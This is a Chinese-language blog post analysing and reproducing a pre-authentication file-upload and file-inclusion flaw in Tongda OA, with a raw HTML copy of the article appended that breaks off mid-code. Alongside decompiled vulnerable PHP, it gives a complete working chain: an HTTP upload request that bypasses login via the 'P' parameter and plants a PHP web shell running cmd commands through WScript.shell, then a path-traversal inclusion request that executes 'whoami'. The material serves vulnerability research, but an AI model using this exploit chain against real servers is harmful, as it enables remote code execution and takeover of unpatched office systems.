通达OA文件上传+任意文件包含漏洞分析复现

Author： Juneha
发布时间：April 21, 2022
1407 views
No comments
454 words
Categories：漏洞复现

0x1 影响范围

V11版
2017版
2016版
2015版
2013版
2013增强版

0x02 环境搭建

通达OA11.3链接：https://pan.baidu.com/s/1_SpZe1W0Gso9phAdMmmXkg 提取码：xusf

0x03漏洞分析

安装完成后可以发现代码是加密的

zend 5.4解密工具：https://www.cr173.com/soft/418289.html

在线解密网站：http://dezend.qiling.org/free/

对web目录进行解密,也可以只解密需要分析的文件

3.1文件上传

存在文件上传漏洞的文件位置 ispirit\im\upload.php，代码如下

<?php

set_time_limit(0);
$P = $_POST["P"];
if (isset($P) || ($P != "")) {
    ob_start();
    include_once "inc/session.php";
    session_id($P);
    session_start();
    session_write_close();
}
else {
    include_once "./auth.php";
}

include_once "inc/utility_file.php";
include_once "inc/utility_msg.php";
include_once "mobile/inc/funcs.php";
ob_end_clean();
$TYPE = $_POST["TYPE"];
$DEST_UID = $_POST["DEST_UID"];
$dataBack = array();
if (($DEST_UID != "") && !td_verify_ids($ids)) {
    $dataBack = array("status" => 0, "content" => "-ERR " . _("接收方ID无效"));
    echo json_encode(data2utf8($dataBack));
    exit();
}

if (strpos($DEST_UID, ",") !== false) {
}
else {
    $DEST_UID = intval($DEST_UID);
}

if ($DEST_UID == 0) {
    if ($UPLOAD_MODE != 2) {
        $dataBack = array("status" => 0, "content" => "-ERR " . _("接收方ID无效"));
        echo json_encode(data2utf8($dataBack));
        exit();
    }
}

$MODULE = "im";

if (1 <= count($_FILES)) {
    if ($UPLOAD_MODE == "1") {
        if (strlen(urldecode($_FILES["ATTACHMENT"]["name"])) != strlen($_FILES["ATTACHMENT"]["name"])) {
            $_FILES["ATTACHMENT"]["name"] = urldecode($_FILES["ATTACHMENT"]["name"]);
        }
    }

    $ATTACHMENTS = upload("ATTACHMENT", $MODULE, false);

    if (!is_array($ATTACHMENTS)) {
        $dataBack = array("status" => 0, "content" => "-ERR " . $ATTACHMENTS);
        echo json_encode(data2utf8($dataBack));
        exit();
    }

    ob_end_clean();
    $ATTACHMENT_ID = substr($ATTACHMENTS["ID"], 0, -1);
    $ATTACHMENT_NAME = substr($ATTACHMENTS["NAME"], 0, -1);

    if ($TYPE == "mobile") {
        $ATTACHMENT_NAME = td_iconv(urldecode($ATTACHMENT_NAME), "utf-8", MYOA_CHARSET);
    }
}
else {
    $dataBack = array("status" => 0, "content" => "-ERR " . _("无文件上传"));
    echo json_encode(data2utf8($dataBack));
    exit();
}

$FILE_SIZE = attach_size($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);

if (!$FILE_SIZE) {
    $dataBack = array("status" => 0, "content" => "-ERR " . _("文件上传失败"));
    echo json_encode(data2utf8($dataBack));
    exit();
}

if ($UPLOAD_MODE == "1") {
    if (is_thumbable($ATTACHMENT_NAME)) {
        $FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);
        $THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . "thumb_" . $ATTACHMENT_NAME;
        CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);
    }

    $P_VER = (is_numeric($P_VER) ? intval($P_VER) : 0);
    $MSG_CATE = $_POST["MSG_CATE"];

    if ($MSG_CATE == "file") {
        $CONTENT = "[fm]" . $ATTACHMENT_ID . "|" . $ATTACHMENT_NAME . "|" . $FILE_SIZE . "[/fm]";
    }
    else if ($MSG_CATE == "image") {
        $CONTENT = "[im]" . $ATTACHMENT_ID . "|" . $ATTACHMENT_NAME . "|" . $FILE_SIZE . "[/im]";
    }
    else {
        $DURATION = intval($DURATION);
        $CONTENT = "[vm]" . $ATTACHMENT_ID . "|" . $ATTACHMENT_NAME . "|" . $DURATION . "[/vm]";
    }

    $AID = 0;
    $POS = strpos($ATTACHMENT_ID, "@");

    if ($POS !== false) {
        $AID = intval(substr($ATTACHMENT_ID, 0, $POS));
    }

    $query = "INSERT INTO im_offline_file (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG,AID) values ('" . date("Y-m-d H:i:s") . "','" . $_SESSION["LOGIN_UID"] . "','$DEST_UID','*" . $ATTACHMENT_ID . "." . $ATTACHMENT_NAME . "','$FILE_SIZE','0','$AID')";
    $cursor = exequery(TD::conn(), $query);
    $FILE_ID = mysql_insert_id();

    if ($cursor === false) {
        $dataBack = array("status" => 0, "content" => "-ERR " . _("数据库操作失败"));
        echo json_encode(data2utf8($dataBack));
        exit();
    }

    $dataBack = array("status" => 1, "content" => $CONTENT, "file_id" => $FILE_ID);
    echo json_encode(data2utf8($dataBack));
    exit();
}
else if ($UPLOAD_MODE == "2") {
    $DURATION = intval($_POST["DURATION"]);
    $CONTENT = "[vm]" . $ATTACHMENT_ID . "|" . $ATTACHMENT_NAME . "|" . $DURATION . "[/vm]";
    $query = "INSERT INTO WEIXUN_SHARE (UID, CONTENT, ADDTIME) VALUES ('" . $_SESSION["LOGIN_UID"] . "', '" . $CONTENT . "', '" . time() . "')";
    $cursor = exequery(TD::conn(), $query);
    echo "+OK " . $CONTENT;
}
else if ($UPLOAD_MODE == "3") {
    if (is_thumbable($ATTACHMENT_NAME)) {
        $FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);
        $THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . "thumb_" . $ATTACHMENT_NAME;
        CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);
    }

    echo "+OK " . $ATTACHMENT_ID;
}
else {
    $CONTENT = "[fm]" . $ATTACHMENT_ID . "|" . $ATTACHMENT_NAME . "|" . $FILE_SIZE . "[/fm]";
    $msg_id = send_msg($_SESSION["LOGIN_UID"], $DEST_UID, 1, $CONTENT, "", 2);
    $query = "insert into IM_OFFLINE_FILE (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG) values ('" . date("Y-m-d H:i:s") . "','" . $_SESSION["LOGIN_UID"] . "','$DEST_UID','*" . $ATTACHMENT_ID . "." . $ATTACHMENT_NAME . "','$FILE_SIZE','0')";
    $cursor = exequery(TD::conn(), $query);
    $FILE_ID = mysql_insert_id();

    if ($cursor === false) {
        echo "-ERR " . _("数据库操作失败");
        exit();
    }

    if ($FILE_ID == 0) {
        echo "-ERR " . _("数据库操作失败2");
        exit();
    }

    echo "+OK ," . $FILE_ID . "," . $msg_id;
    exit();
}

?>

关键代码3-14行，这里只要传递参数"P"或参数P不为空，那么就不会进入else语句，auth.php主要实现身份认证功能，通过这里的参数"P"绕过登录认证

set_time_limit(0);
$P = $_POST["P"];
if (isset($P) || ($P != "")) {
    ob_start();
    include_once "inc/session.php";
    session_id($P);
    session_start();
    session_write_close();
}
else {
    include_once "./auth.php";
}

直接访问

传入P，已经绕过了登录限制

然后接下来根据流程，开始判断DEST_UID参数，只需要传入一个不为空和0的数字即可

$DEST_UID = $_POST["DEST_UID"];
$dataBack = array();
if (($DEST_UID != "") && !td_verify_ids($ids)) {
    $dataBack = array("status" => 0, "content" => "-ERR " . _("接收方ID无效"));
    echo json_encode(data2utf8($dataBack));
    exit();
}

if (strpos($DEST_UID, ",") !== false) {
}
else {
    $DEST_UID = intval($DEST_UID);
}

if ($DEST_UID == 0) {
    if ($UPLOAD_MODE != 2) {
        $dataBack = array("status" => 0, "content" => "-ERR " . _("接收方ID无效"));
        echo json_encode(data2utf8($dataBack));
        exit();
    }
}

接下来继续跟进函数，只要是全局变量1 <= count($_FILES)即可，也就是有文件上传就会调用upload函数

if (1 <= count($_FILES)) {
    if ($UPLOAD_MODE == "1") {
        if (strlen(urldecode($_FILES["ATTACHMENT"]["name"])) != strlen($_FILES["ATTACHMENT"]["name"])) {
            $_FILES["ATTACHMENT"]["name"] = urldecode($_FILES["ATTACHMENT"]["name"]);
        }
    }

    $ATTACHMENTS = upload("ATTACHMENT", $MODULE, false);

upload函数，位于inc/utility_file.php的1665行,代码如下

function upload($PREFIX, $MODULE, $OUTPUT)
{
    if (strstr($MODULE, "/") || strstr($MODULE, "\\")) {
        if (!$OUTPUT) {
            return _("参数含有非法字符。");
        }

        Message(_("错误"), _("参数含有非法字符。"));
        exit();
    }

    $ATTACHMENTS = array("ID" => "", "NAME" => "");
    reset($_FILES);

    foreach ($_FILES as $KEY => $ATTACHMENT ) {
        if (($ATTACHMENT["error"] == 4) || (($KEY != $PREFIX) && (substr($KEY, 0, strlen($PREFIX) + 1) != $PREFIX . "_"))) {
            continue;
        }

        $data_charset = (isset($_GET["data_charset"]) ? $_GET["data_charset"] : (isset($_POST["data_charset"]) ? $_POST["data_charset"] : ""));
        $ATTACH_NAME = ($data_charset != "" ? td_iconv($ATTACHMENT["name"], $data_charset, MYOA_CHARSET) : $ATTACHMENT["name"]);
        $ATTACH_SIZE = $ATTACHMENT["size"];
        $ATTACH_ERROR = $ATTACHMENT["error"];
        $ATTACH_FILE = $ATTACHMENT["tmp_name"];
        $ERROR_DESC = "";

        if ($ATTACH_ERROR == UPLOAD_ERR_OK) {
            if (!is_uploadable($ATTACH_NAME)) {
                $ERROR_DESC = sprintf(_("禁止上传后缀名为[%s]的文件"), substr($ATTACH_NAME, strrpos($ATTACH_NAME, ".") + 1));
            }

            $encode = mb_detect_encoding($ATTACH_NAME, array("ASCII", "UTF-8", "GB2312", "GBK", "BIG5"));

            if ($encode != "UTF-8") {
                $ATTACH_NAME_UTF8 = mb_convert_encoding($ATTACH_NAME, "utf-8", MYOA_CHARSET);
            }
            else {
                $ATTACH_NAME_UTF8 = $ATTACH_NAME;
            }

            if (preg_match("/[\':<>?]|\/|\\\\|\"|\|/u", $ATTACH_NAME_UTF8)) {
                $ERROR_DESC = sprintf(_("文件名[%s]包含[/\'\":*?<>|]等非法字符"), $ATTACH_NAME);
            }

            if ($ATTACH_SIZE == 0) {
                $ERROR_DESC = sprintf(_("文件[%s]大小为0字节"), $ATTACH_NAME);
            }

            if ($ERROR_DESC == "") {
                $ATTACH_NAME = str_replace("'", "", $ATTACH_NAME);
                $ATTACH_ID = add_attach($ATTACH_FILE, $ATTACH_NAME, $MODULE);

                if ($ATTACH_ID === false) {
        

        $ERROR_DESC = sprintf(_("文件[%s]上传失败"), $ATTACH_NAME);
            }
            else {
                $ATTACHMENTS["ID"] .= $ATTACH_ID . ",";
                $ATTACHMENTS["NAME"] .= $ATTACH_NAME . "*";
            }
        }

        @unlink($ATTACH_FILE);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_INI_SIZE) {
        $ERROR_DESC = sprintf(_("文件[%s]的大小超过了系统限制（%s）"), $ATTACH_NAME, ini_get("upload_max_filesize"));
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_FORM_SIZE) {
        $ERROR_DESC = sprintf(_("文件[%s]的大小超过了表单限制"), $ATTACH_NAME);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_PARTIAL) {
        $ERROR_DESC = sprintf(_("文件[%s]上传不完整"), $ATTACH_NAME);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_NO_TMP_DIR) {
        $ERROR_DESC = sprintf(_("文件[%s]上传失败：找不到临时文件夹"), $ATTACH_NAME);
    }
    else if ($ATTACH_ERROR == UPLOAD_ERR_CANT_WRITE) {
        $ERROR_DESC = sprintf(_("文件[%s]写入失败"), $ATTACH_NAME);
    }
    else {
        $ERROR_DESC = sprintf(_("未知错误[代码：%s]"), $ATTACH_ERROR);
    }

    if ($ERROR_DESC != "") {
        if (!$OUTPUT) {
            delete_attach($ATTACHMENTS["ID"], $ATTACHMENTS["NAME"], $MODULE);

            return $ERROR_DESC;
        }
        else {
            Message(_("错误"), $ERROR_DESC);
        }
    }
}

return $ATTACHMENTS;

}

调用了同文件下的is_uploadable()函数对文件名进行检查：

if (!is_uploadable($ATTACH_NAME)) {
            $ERROR_DESC = sprintf(_("禁止上传后缀名为[%s]的文件"), substr($ATTACH_NAME, strrpos($ATTACH_NAME, ".") + 1));
        }

圈出来的代码代码意思是寻找最后一次出现 . 的位置，然后寻找后三个字符，然后变成小写字符看是否匹配字符’php’，绕过方式也很简单在最后加.即可,不过上传的文件不在web目录所以没什么用

然后构造文件上传包

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.10.161
Content-Length: 656
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJQo61MS4LliQDRSH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name="UPLOAD_MODE"

1
------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name="P"

1
------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundaryJQo61MS4LliQDRSH
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundaryJQo61MS4LliQDRSH--

文件存在于MYOA\attach\im 下

3.2文件包含

漏洞文件位于ispirit/interface/gateway.php

<?php

ob_start();
include_once "inc/session.php";
include_once "inc/conn.php";
include_once "inc/utility_org.php";

if ($P != "") {
    if (preg_match("/[^a-z0-9;]+/i", $P)) {
        echo _("非法参数");
        exit();
    }

    session_id($P);
    session_start();
    session_write_close();
    if (($_SESSION["LOGIN_USER_ID"] == "") || ($_SESSION["LOGIN_UID"] == "")) {
        echo _("RELOGIN");
        exit();
    }
}

if ($json) {
    $json = stripcslashes($json);
    $json = (array) json_decode($json);

    foreach ($json as $key => $val ) {
        if ($key == "data") {
            $val = (array) $val;

            foreach ($val as $keys => $value ) {
                $keys = $value;
            }
        }

        if ($key == "url") {
            $url = $val;
        }
    }

    if ($url != "") {
        if (substr($url, 0, 1) == "/") {
            $url = substr($url, 1);
        }

        if ((strpos($url, "general/") !== false) || (strpos($url, "ispirit/") !== false) || (strpos($url, "module/") !== false)) {
            include_once $url;
        }
    }

    exit();
}

?>

对$P进行了是否为空、判断当前用户是否登录，只需要使$P为空就不会进入if条件

if ($P != "") {
    if (preg_match("/[^a-z0-9;]+/i", $P)) {
        echo _("非法参数");
        exit();
    }

    session_id($P);
    session_start();
    session_write_close();
    if (($_SESSION["LOGIN_USER_ID"] == "") || ($_SESSION["LOGIN_UID"] == "")) {
        echo _("RELOGIN");
        exit();
    }
}

之后从json中获取url参数的，以只要在传入的json数据中使url参数中包含ispirit/、general/、module/再跳转目录到包含的文件即可进行任意文件包含。

if ($json) {
    $json = stripcslashes($json); //去掉反斜杠 
    $json = (array) json_decode($json);//转为数组
    //遍历
    foreach ($json as $key => $val ) {
        if ($key == "data") {
            $val = (array) $val;

            foreach ($val as $keys => $value ) {
                $keys = $value;
            }
        }
        //判断是否有url这个键,有的话把值赋值给$url
        if ($key == "url") {
            $url = $val;
        }
    }
    //$url不为空进入if
    if ($url != "") {
        //如果是/开头，就去除/
        if (substr($url, 0, 1) == "/") {
            $url = substr($url, 1);
        }
        //判断参数是否包含ispirit/、general/、module/
        if ((strpos($url, "general/") !== false) || (strpos($url, "ispirit/") !== false) || (strpos($url, "module/") !== false)) {
            include_once $url;
        }
    }

    exit();
}

0x04 漏洞复现

成功上传后,现在开始包含payload：

json={"url":"ispirit/../../attach/im/2204/436106789.jpg"}&cmd=whoami

成功执行

前面说过可以用.php.来绕过is_uploadable函数的检测，这里演示一下

查看

0x05版本路径

有些版本gateway.php路径不同
例如2013：

/ispirit/im/upload.php
/ispirit/interface/gateway.php

例如2017：

/ispirit/im/upload.php
/mac/gateway.php

0x06 参考

https://xz.aliyun.com/t/7424

Last modification：April 21, 2022

本文作者：Juneha
本文链接：https://blog.mo60.cn/index.php/archives/239.html
版权声明：本博客所有文章除特别声明外，均默认采用 CC BY-NC-SA 4.0 许可协议。
法律说明：
文章声明：文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任，本人坚决反对利用文章内容进行恶意攻击行为，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全，本文内容未隐讳任何个人、群体、公司。非文学作品，请勿过度理解，根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途。

如果觉得我的文章对你有用，请随意赞赏,可备注留下ID方便感谢

通达OA文件上传+任意文件包含漏洞分析复现

Juneha • 2022 年 04 月 21 日

<h2>0x1 影响范围</h2><ul><li>V11版</li><li>2017版</li><li>2016版</li><li>2015版</li><li>2013版</li><li>2013增强版</li></ul><h2>0x02 环境搭建</h2>通达OA11.3链接：<a class="no-external-link" href="https://pan.baidu.com/s/1_SpZe1W0Gso9phAdMmmXkg" target="_blank">https://pan.baidu.com/s/1_SpZe1W0Gso9phAdMmmXkg</a> 提取码：xusf<h2>0x03漏洞分析</h2>安装完成后可以发现代码是加密的zend 5.4解密工具：<a class="no-external-link" href="https://www.cr173.com/soft/418289.html" target="_blank">https://www.cr173.com/soft/418289.html</a>在线解密网站：<a class="no-external-link" href="http://dezend.qiling.org/free/" target="_blank">http://dezend.qiling.org/free/</a>对web目录进行解密,也可以只解密需要分析的文件<img src="http://blog.mo60.cn/usr/uploads/2022/04/3706923387.png" alt="31784-m7d7dypfd79.png" title="31784-m7d7dypfd79.png"style=""><h3>3.1文件上传</h3>存在文件上传漏洞的文件位置 ispirit\im\upload.php，代码如下<pre><code>&lt;?php

set_time_limit(0);
$P = $_POST[&quot;P&quot;];
if (isset($P) || ($P != &quot;&quot;)) {
    ob_start();
    include_once &quot;inc/session.php&quot;;
    session_id($P);
    session_start();
    session_write_close();
}
else {
    include_once &quot;./auth.php&quot;;
}

include_once &quot;inc/utility_file.php&quot;;
include_once &quot;inc/utility_msg.php&quot;;
include_once &quot;mobile/inc/funcs.php&quot;;
ob_end_clean();
$TYPE = $_POST[&quot;TYPE&quot;];
$DEST_UID = $_POST[&quot;DEST_UID&quot;];
$dataBack = array();
if (($DEST_UID != &quot;&quot;) &amp;&amp; !td_verify_ids($ids)) {
    $dataBack = array(&quot;status&quot; =&gt; 0, &quot;content&quot; =&gt; &quot;-ERR &quot; . _(&quot;接收方ID无效&quot;));
    echo json_encode(data2utf8($dataBack));
    exit();
}

if (strpos($DEST_UID, &quot;,&quot;) !== false) {
}
else {
    $DEST_UID = intval($DEST_UID);
}

$MODULE = &quot;im&quot;;

if (1 &lt;= count($_FILES)) {
    if ($UPLOAD_MODE == &quot;1&quot;) {
        if (strlen(urldecode($_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;])) != strlen($_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;])) {
            $_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;] = urldecode($_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;]);
        }
    }

$ATTACHMENTS = upload(&quot;ATTACHMENT&quot;, $MODULE, false);

if (!is_array($ATTACHMENTS)) {
        $dataBack = array(&quot;status&quot; =&gt; 0, &quot;content&quot; =&gt; &quot;-ERR &quot; . $ATTACHMENTS);
        echo json_encode(data2utf8($dataBack));
        exit();
    }

ob_end_clean();
    $ATTACHMENT_ID = substr($ATTACHMENTS[&quot;ID&quot;], 0, -1);
    $ATTACHMENT_NAME = substr($ATTACHMENTS[&quot;NAME&quot;], 0, -1);

if ($TYPE == &quot;mobile&quot;) {
        $ATTACHMENT_NAME = td_iconv(urldecode($ATTACHMENT_NAME), &quot;utf-8&quot;, MYOA_CHARSET);
    }
}
else {
    $dataBack = array(&quot;status&quot; =&gt; 0, &quot;content&quot; =&gt; &quot;-ERR &quot; . _(&quot;无文件上传&quot;));
    echo json_encode(data2utf8($dataBack));
    exit();
}

$FILE_SIZE = attach_size($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);

if (!$FILE_SIZE) {
    $dataBack = array(&quot;status&quot; =&gt; 0, &quot;content&quot; =&gt; &quot;-ERR &quot; . _(&quot;文件上传失败&quot;));
    echo json_encode(data2utf8($dataBack));
    exit();
}

if ($UPLOAD_MODE == &quot;1&quot;) {
    if (is_thumbable($ATTACHMENT_NAME)) {
        $FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);
        $THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . &quot;thumb_&quot; . $ATTACHMENT_NAME;
        CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);
    }

$P_VER = (is_numeric($P_VER) ? intval($P_VER) : 0);
    $MSG_CATE = $_POST[&quot;MSG_CATE&quot;];

if ($MSG_CATE == &quot;file&quot;) {
        $CONTENT = &quot;[fm]&quot; . $ATTACHMENT_ID . &quot;|&quot; . $ATTACHMENT_NAME . &quot;|&quot; . $FILE_SIZE . &quot;[/fm]&quot;;
    }
    else if ($MSG_CATE == &quot;image&quot;) {
        $CONTENT = &quot;[im]&quot; . $ATTACHMENT_ID . &quot;|&quot; . $ATTACHMENT_NAME . &quot;|&quot; . $FILE_SIZE . &quot;[/im]&quot;;
    }
    else {
        $DURATION = intval($DURATION);
        $CONTENT = &quot;[vm]&quot; . $ATTACHMENT_ID . &quot;|&quot; . $ATTACHMENT_NAME . &quot;|&quot; . $DURATION . &quot;[/vm]&quot;;
    }

$AID = 0;
    $POS = strpos($ATTACHMENT_ID, &quot;@&quot;);

if ($POS !== false) {
        $AID = intval(substr($ATTACHMENT_ID, 0, $POS));
    }

$query = &quot;INSERT INTO im_offline_file (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG,AID) values ('&quot; . date(&quot;Y-m-d H:i:s&quot;) . &quot;','&quot; . $_SESSION[&quot;LOGIN_UID&quot;] . &quot;','$DEST_UID','*&quot; . $ATTACHMENT_ID . &quot;.&quot; . $ATTACHMENT_NAME . &quot;','$FILE_SIZE','0','$AID')&quot;;
    $cursor = exequery(TD::conn(), $query);
    $FILE_ID = mysql_insert_id();

if ($cursor === false) {
        $dataBack = array(&quot;status&quot; =&gt; 0, &quot;content&quot; =&gt; &quot;-ERR &quot; . _(&quot;数据库操作失败&quot;));
        echo json_encode(data2utf8($dataBack));
        exit();
    }

$dataBack = array(&quot;status&quot; =&gt; 1, &quot;content&quot; =&gt; $CONTENT, &quot;file_id&quot; =&gt; $FILE_ID);
    echo json_encode(data2utf8($dataBack));
    exit();
}
else if ($UPLOAD_MODE == &quot;2&quot;) {
    $DURATION = intval($_POST[&quot;DURATION&quot;]);
    $CONTENT = &quot;[vm]&quot; . $ATTACHMENT_ID . &quot;|&quot; . $ATTACHMENT_NAME . &quot;|&quot; . $DURATION . &quot;[/vm]&quot;;
    $query = &quot;INSERT INTO WEIXUN_SHARE (UID, CONTENT, ADDTIME) VALUES ('&quot; . $_SESSION[&quot;LOGIN_UID&quot;] . &quot;', '&quot; . $CONTENT . &quot;', '&quot; . time() . &quot;')&quot;;
    $cursor = exequery(TD::conn(), $query);
    echo &quot;+OK &quot; . $CONTENT;
}
else if ($UPLOAD_MODE == &quot;3&quot;) {
    if (is_thumbable($ATTACHMENT_NAME)) {
        $FILE_PATH = attach_real_path($ATTACHMENT_ID, $ATTACHMENT_NAME, $MODULE);
        $THUMB_FILE_PATH = substr($FILE_PATH, 0, strlen($FILE_PATH) - strlen($ATTACHMENT_NAME)) . &quot;thumb_&quot; . $ATTACHMENT_NAME;
        CreateThumb($FILE_PATH, 320, 240, $THUMB_FILE_PATH);
    }

echo &quot;+OK &quot; . $ATTACHMENT_ID;
}
else {
    $CONTENT = &quot;[fm]&quot; . $ATTACHMENT_ID . &quot;|&quot; . $ATTACHMENT_NAME . &quot;|&quot; . $FILE_SIZE . &quot;[/fm]&quot;;
    $msg_id = send_msg($_SESSION[&quot;LOGIN_UID&quot;], $DEST_UID, 1, $CONTENT, &quot;&quot;, 2);
    $query = &quot;insert into IM_OFFLINE_FILE (TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG) values ('&quot; . date(&quot;Y-m-d H:i:s&quot;) . &quot;','&quot; . $_SESSION[&quot;LOGIN_UID&quot;] . &quot;','$DEST_UID','*&quot; . $ATTACHMENT_ID . &quot;.&quot; . $ATTACHMENT_NAME . &quot;','$FILE_SIZE','0')&quot;;
    $cursor = exequery(TD::conn(), $query);
    $FILE_ID = mysql_insert_id();

if ($cursor === false) {
        echo &quot;-ERR &quot; . _(&quot;数据库操作失败&quot;);
        exit();
    }

if ($FILE_ID == 0) {
        echo &quot;-ERR &quot; . _(&quot;数据库操作失败2&quot;);
        exit();
    }

echo &quot;+OK ,&quot; . $FILE_ID . &quot;,&quot; . $msg_id;
    exit();
}

?&gt;
</code></pre>关键代码3-14行，这里只要传递参数"P"或参数P不为空，那么就不会进入else语句，auth.php主要实现身份认证功能，通过这里的参数"P"绕过登录认证<pre><code>set_time_limit(0);
$P = $_POST[&quot;P&quot;];
if (isset($P) || ($P != &quot;&quot;)) {
 ob_start();
 include_once &quot;inc/session.php&quot;;
 session_id($P);
 session_start();
 session_write_close();
}
else {
 include_once &quot;./auth.php&quot;;
}
</code></pre>直接访问<img src="http://blog.mo60.cn/usr/uploads/2022/04/819100714.png" alt="62156-4erkz511vs6.png" title="62156-4erkz511vs6.png"style="">传入P，已经绕过了登录限制<img src="http://blog.mo60.cn/usr/uploads/2022/04/1817480819.png" alt="19753-pm3y6wl57dm.png" title="19753-pm3y6wl57dm.png"style="">然后接下来根据流程，开始判断DEST_UID参数，只需要传入一个不为空和0的数字即可<pre><code>$DEST_UID = $_POST[&quot;DEST_UID&quot;];
$dataBack = array();
if (($DEST_UID != &quot;&quot;) &amp;&amp; !td_verify_ids($ids)) {
 $dataBack = array(&quot;status&quot; =&gt; 0, &quot;content&quot; =&gt; &quot;-ERR &quot; . _(&quot;接收方ID无效&quot;));
 echo json_encode(data2utf8($dataBack));
 exit();
}

if (strpos($DEST_UID, &quot;,&quot;) !== false) {
}
else {
    $DEST_UID = intval($DEST_UID);
}

if ($DEST_UID == 0) {
 if ($UPLOAD_MODE != 2) {
 $dataBack = array(&quot;status&quot; =&gt; 0, &quot;content&quot; =&gt; &quot;-ERR &quot; . _(&quot;接收方ID无效&quot;));
 echo json_encode(data2utf8($dataBack));
 exit();
 }
}
</code></pre><img src="http://blog.mo60.cn/usr/uploads/2022/04/1517141250.png" alt="65241-f6trh17vp9a.png" title="65241-f6trh17vp9a.png"style="">接下来继续跟进函数，只要是全局变量1 &lt;= count($_FILES)即可，也就是有文件上传就会调用upload函数<pre><code>if (1 &lt;= count($_FILES)) {
 if ($UPLOAD_MODE == &quot;1&quot;) {
 if (strlen(urldecode($_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;])) != strlen($_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;])) {
 $_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;] = urldecode($_FILES[&quot;ATTACHMENT&quot;][&quot;name&quot;]);
 }
 }

$ATTACHMENTS = upload(&quot;ATTACHMENT&quot;, $MODULE, false);
</code></pre>upload函数，位于inc/utility_file.php的1665行,代码如下<pre><code>function upload($PREFIX, $MODULE, $OUTPUT)
{
 if (strstr($MODULE, &quot;/&quot;) || strstr($MODULE, &quot;\\&quot;)) {
 if (!$OUTPUT) {
 return _(&quot;参数含有非法字符。&quot;);
 }

Message(_(&quot;错误&quot;), _(&quot;参数含有非法字符。&quot;));
        exit();
    }

$ATTACHMENTS = array(&quot;ID&quot; =&gt; &quot;&quot;, &quot;NAME&quot; =&gt; &quot;&quot;);
    reset($_FILES);

foreach ($_FILES as $KEY =&gt; $ATTACHMENT ) {
        if (($ATTACHMENT[&quot;error&quot;] == 4) || (($KEY != $PREFIX) &amp;&amp; (substr($KEY, 0, strlen($PREFIX) + 1) != $PREFIX . &quot;_&quot;))) {
            continue;
        }

$data_charset = (isset($_GET[&quot;data_charset&quot;]) ? $_GET[&quot;data_charset&quot;] : (isset($_POST[&quot;data_charset&quot;]) ? $_POST[&quot;data_charset&quot;] : &quot;&quot;));
        $ATTACH_NAME = ($data_charset != &quot;&quot; ? td_iconv($ATTACHMENT[&quot;name&quot;], $data_charset, MYOA_CHARSET) : $ATTACHMENT[&quot;name&quot;]);
        $ATTACH_SIZE = $ATTACHMENT[&quot;size&quot;];
        $ATTACH_ERROR = $ATTACHMENT[&quot;error&quot;];
        $ATTACH_FILE = $ATTACHMENT[&quot;tmp_name&quot;];
        $ERROR_DESC = &quot;&quot;;

if ($ATTACH_ERROR == UPLOAD_ERR_OK) {
            if (!is_uploadable($ATTACH_NAME)) {
                $ERROR_DESC = sprintf(_(&quot;禁止上传后缀名为[%s]的文件&quot;), substr($ATTACH_NAME, strrpos($ATTACH_NAME, &quot;.&quot;) + 1));
            }

$encode = mb_detect_encoding($ATTACH_NAME, array(&quot;ASCII&quot;, &quot;UTF-8&quot;, &quot;GB2312&quot;, &quot;GBK&quot;, &quot;BIG5&quot;));

if ($encode != &quot;UTF-8&quot;) {
                $ATTACH_NAME_UTF8 = mb_convert_encoding($ATTACH_NAME, &quot;utf-8&quot;, MYOA_CHARSET);
            }
